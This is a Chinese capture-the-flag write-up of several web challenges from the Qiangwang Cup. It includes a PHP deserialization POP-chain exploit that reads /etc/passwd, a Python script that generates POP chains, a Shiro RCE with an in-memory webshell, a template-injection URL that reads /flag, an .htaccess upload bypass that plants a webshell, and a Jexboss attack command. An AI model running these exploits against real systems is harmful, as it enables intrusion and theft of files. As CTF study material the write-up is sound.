强网杯 部分WEB WP
Web
赌徒
好像随便构造一下就能读文件了,直接读 /flag。
<?php
class Start
{
    // Echoed by _sayhello(); when an object is stored here, echo converts it
    // with that object's __toString(), which is what the chain below relies on.
    public $name;
    // Decoy string: it is only ever echoed by __get(), never executed.
    public $flag='syst3m("cat 127.0.0.1/etc/hint");';
    public function _sayhello(){
        echo $this->name;
        return 'ok';
    }
    // Runs automatically when an instance is unserialize()d; this is the
    // entry point of the gadget chain, so untrusted serialized input must
    // never reach unserialize() with this class loaded.
    public function __wakeup(){
        //echo "hi";
        $this->_sayhello();
    }
    // Called on a read of an undefined/inaccessible property; echoes $flag.
    public function __get($cc){
        echo "give you flag : ".$this->flag;
        return ;
    }
}
class Info
{
    private $phonenumber=123123;
    public $promise='I do';
    // Invoked when the object is used as a string (e.g. echoed by
    // Start::_sayhello()).  $this->file is not declared on this class; the
    // payload below sets it dynamically so that $this->file['filename'] holds
    // a Room, and reading its undefined property "ffiillee" then triggers
    // Room::__get().  The returned value is whatever that __get() yields.
    public function __toString(){
        return $this->file['filename']->ffiillee['ffiilleennaammee'];
    }
}
class Room
{
    public $filename='/flag';
    public $sth_to_set;
    public $a='';
    // Reading an undefined property calls whatever is stored in $a; when $a
    // holds an object, PHP dispatches to that object's __invoke().
    public function __get($name){
        $function = $this->a;
        return $function();
    }
    // Arbitrary file read: $file is passed to file_get_contents() without any
    // validation or path restriction, and the contents are echoed base64-encoded.
    public function Get_hint($file){
        $hint=base64_encode(file_get_contents($file));
        echo $hint;
        return ;
    }
    // Get_hint() echoes and returns nothing, so $content is null here and the
    // second echo prints an empty string.
    public function __invoke(){
        $content = $this->Get_hint($this->filename);
        echo $content;
    }
}
// Wire the objects so that unserialize() walks:
// Start::__wakeup() -> echo Info -> Info::__toString()
// -> Room::__get() -> Room::__invoke() -> Room::Get_hint('/etc/passwd').
// This is the demonstration of why unserialize() must never see untrusted data.
$reader = new Room;
$reader->filename = '/etc/passwd';
$trigger = new Room;
$trigger->a = $reader;
$info = new Info;
$info->file['filename'] = $trigger;
$start = new Start;
$start->name = $info;
// Print the URL-encoded payload, then replay it locally to check the chain.
print_r(urlencode(serialize($start))."\r\n");
unserialize(serialize($start));
pop_master
PHP_Parser生成AST存在a.json里
然后python写个脚本BFS找通路,用极其暴力的方法剪枝。。。
脚本如下
import json
import queue
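# Parsed PHP AST (from PHP-Parser) as a list of class nodes; each node is read
# for its 'name' and 'stmts' below.  The original opened the file without
# closing it; a `with` block releases the handle.
# NOTE: the name `ast` shadows the stdlib module of the same name; kept because
# the rest of the script refers to it.
with open('a.json', 'rb') as fp:
    ast = json.load(fp)
# class name -> class node
classes = {node['name']['name']: node for node in ast}
# method name -> name of the class declaring it.  On duplicate method names the
# last class seen wins, exactly as in the original loop.
f2cTable = {}
#ban_function = ['YkN508','frZNkk','N3R1ow','N3R1ow','CCO4GN','LCG9b8','ILnKZX']
ban_function = []  # method names pruned from the search, filled in by hand
for pclass in ast:
    for f in pclass["stmts"]:
        if f['nodeType'] == "Stmt_ClassMethod":
            f2cTable[f['name']['name']] = pclass['name']['name']
#print(f2cTable['GCLh2c'])
#print(classes_index)
#entrypoint_class =
#entrypoint_args = "cat /flag"
# (className + functionName) -> True once the state has been expanded
visit_function = {}
q = queue.SimpleQueue()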
class State:
    """One BFS node: a (class, method) pair plus the node it was reached from.

    ``father`` is ``None`` for the root state; printTree() follows the chain
    of ``father`` links back to the root.
    """

    def __init__(self, curClassName, curFunctionName, father):
        # Parameter names are part of the call interface and kept unchanged.
        self.className, self.functionName, self.father = (
            curClassName,
            curFunctionName,
            father,
        )
# Root of the search: the challenge's entry class/method (taken from the AST).
initState = State(curClassName='MoAUb1', curFunctionName="HsGsAu", father=None)
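def printTree(s: State):
    """Print PHP that instantiates the chain of classes ending at *s*.

    Walks the ``father`` links from *s* back to the root and emits, for each
    ancestor, a ``new`` statement plus an assignment of the child object into
    the ancestor's first declared property.  The property is read from
    ``classes[...]['stmts'][0]['props'][0]``, i.e. the script assumes the first
    statement of every class node is a property declaration — TODO confirm
    against the AST; a class whose first statement is a method raises KeyError.

    Args:
        s: the State at the end (deepest point) of the discovered chain.
    """
    lines = [f"$my{s.className} = new {s.className};\r\n"]
    child, father = s, s.father
    while father is not None:  # original compared with `!= None`
        prop = classes[father.className]['stmts'][0]['props'][0]['name']['name']
        lines.append(f"$my{father.className} = new {father.className};\r\n")
        lines.append(f"$my{father.className}->{prop} = $my{child.className};\r\n")
        child, father = father, father.father
    # join once instead of repeated `+=` on the growing string
    print("".join(lines))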
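# Breadth-first search over method-call edges, starting at initState, until a
# method containing an `eval` expression (Expr_Eval) is reached; the chain of
# classes leading there is then printed by printTree() and the script exits.
q.put(initState)
while not q.empty():
    curState = q.get()
    # Visited check.  The original used hasattr() on the dict, which never
    # matches a key, so every state was re-expanded; `in` is the intended test.
    key = curState.className + curState.functionName
    if key in visit_function:
        continue
    visit_function[key] = True
    if curState.functionName in ban_function:
        continue
    # Locate the AST node of the current method inside its class.
    cur_function = None
    for f in classes[curState.className]["stmts"]:
        if f['nodeType'] == "Stmt_ClassMethod" and f['name']['name'] == curState.functionName:
            cur_function = f
            break
    if cur_function is None:
        # Should not happen when f2cTable is consistent with classes; the
        # original raised TypeError here.
        continue
    # Name of the method's first parameter.  A statement that reassigns it is
    # treated as breaking the data flow, and the method is abandoned.
    cur_param = cur_function['params'][0]['var']['name']
    for stmt in cur_function['stmts']:
        if stmt['nodeType'] == 'Stmt_Expression':
            if stmt['expr']['nodeType'] == "Expr_Assign" and stmt['expr']['var']['name'] == cur_param:
                print(stmt['expr']['var']['name'], cur_param)
                break
            elif stmt['expr']['nodeType'] == "Expr_Eval":
                # Sink found: print the chain and stop.
                printTree(curState)
                exit(0)
            elif stmt['expr']['nodeType'] == "Expr_MethodCall":
                # Follow the call to the class that declares the callee.
                next_f = stmt['expr']['name']['name']
                q.put(State(f2cTable[next_f], next_f, curState))
        elif stmt['nodeType'] == 'Stmt_For':
            # Prune methods whose for-loop body touches the parameter.
            # `.get` avoids a KeyError on expressions without a 'var' node
            # (the original indexed it directly).
            touched = False
            for forstmt in stmt['stmts']:
                if forstmt['nodeType'] == 'Stmt_Expression':
                    if forstmt['expr'].get("var", {}).get("name") == cur_param:
                        touched = True
                        break
            if touched:
                break
        elif stmt['nodeType'] == 'Stmt_If':
            if stmt['cond']['nodeType'] == "Expr_FuncCall":
                # Presumably a call whose second argument is a method-name
                # literal (e.g. a method_exists-style check) — TODO confirm
                # against the AST; other call shapes raise KeyError/IndexError.
                next_f = stmt['cond']['args'][1]['value']['value']
                q.put(State(f2cTable[next_f], next_f, curState))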
自动生成POP链手动打
Hard_Penetration
首先进去是个登录页面,发现 set-cookie: rememberMe=deleteMe
很明显shiro框架,尝试shiro反序列化打,需要找AES的密钥,一般为硬编码默认的密钥

密钥硬编码,直接RCE,注入冰蝎内存马后发现:
netstat看下,结合ports.conf发现在8005端口还开放web服务

内网代理出来发现是一个cms,并且存在后台,而且后台给出了是juhucms

而且该CMS直接可以遍历文件,发现其目录结构和baoCMS完全一致,下载源码进行审计发现在模板处理处:

和74cms的模板注入比较类似,继续向上看fetch的调用发现:

display调用了fetch,一般display也就是模板的渲染,因此我们需要找一个可以访问的路由,并且使得templateFile可控,全局搜索:

这些CommonAction都有该方法,但是有很多鉴权需要登录后台,而后台用默认口令和弱口令貌似都进不去,发现在wap模块中:

这是可访问的路由,并且不需要鉴权,因此我们构造访问路由即可:
http://127.0.0.1:8005/wap/common/show?templateFile=/flag

EasyWeb
进入给了Hint说端口在30000-50000,扫端口发现:36842
一个登录页面,但是username存在注入,SQLMAP直接梭了,得到
admin 99f609527226e076d668668582ac4420
进去一顿试,题目说是easy_SSRF,结果后台有个/file能上传文件。。。
对文件内容和名字进行过滤,上传.htaccess
AddHandler php5-script aaa
然后上传一个aaa.aaa
传个马上去然后看下其他人操作和netstat

发现8006开了jboss,而且是root开的,flag是root才可读

直接用Jexboss梭了

不过我弹 shell 之后在本地用,虽然是 root 但无法执行命令,队友试了下可以

python3 .\jexboss.py -u http://127.0.0.1:8006
直接cat flag
寻宝
Part1 绕过如下

Part2 idm下载 全局搜索KEY2
import os
import docx
import base64
import binascii
import shutil
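# Walk the extracted archive: dump the text of every .docx that mentions KEY2
# to <filename>.png in the cwd, and copy every .png found into the cwd.
dir_path = "five_month"
for root, dirs, files in os.walk(dir_path):
    for filename in files:
        filepath = os.path.join(root, filename)
        if filename.endswith(".docx"):
            # Concatenate the text of all paragraphs (original used `+=`).
            document = docx.Document(filepath)
            fulltext = "".join(p.text for p in document.paragraphs)
            raw = fulltext.encode()
            # The original wrapped this in `except binascii.Error: pass`, but
            # str.encode() never raises that exception, so the handler was dead
            # code and is dropped; the text is written as-is, not decoded.
            if b"KEY2" in raw:
                with open(filename + ".png", "wb") as out:
                    out.write(raw)
        if filename.endswith(".png"):
            # NOTE: same-named files in different subdirectories overwrite
            # each other in the cwd, as in the original.
            shutil.copy(filepath, filename)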